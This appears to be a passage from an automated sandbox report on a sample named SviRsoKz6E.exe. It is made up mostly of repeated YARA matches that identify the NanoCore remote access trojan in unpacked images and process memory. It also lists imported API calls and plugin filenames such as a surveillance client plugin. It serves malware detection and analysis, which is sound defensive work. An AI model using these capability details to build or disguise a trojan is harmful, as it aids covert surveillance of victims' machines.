      Source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_004067BE0_2_004067BE
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0040A2A52_2_0040A2A5
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0232E47C2_2_0232E47C
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0232E4802_2_0232E480
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0232BBD42_2_0232BBD4
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_051DF5F82_2_051DF5F8
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_051D97882_2_051D9788
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_051DA5F82_2_051DA5F8
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_051DA6102_2_051DA610
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_053865502_2_05386550
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_05383E302_2_05383E30
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0538C3802_2_0538C380
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_05384A502_2_05384A50
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_0538CF982_2_0538CF98
      Source: SviRsoKz6E.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Adobe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: SviRsoKz6E.exe, 00000000.00000003.199417831.00000000036EF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000000.00000002.200554273.0000000000A50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000002.00000002.467548471.0000000006510000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000002.00000002.467152505.00000000058E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000002.00000002.467019757.00000000057F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exe, 00000002.00000002.466637009.0000000005350000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SviRsoKz6E.exe
      Source: SviRsoKz6E.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.466831873.00000000056A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.466831873.00000000056A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.56a0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.56a0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.24941a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.24941a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
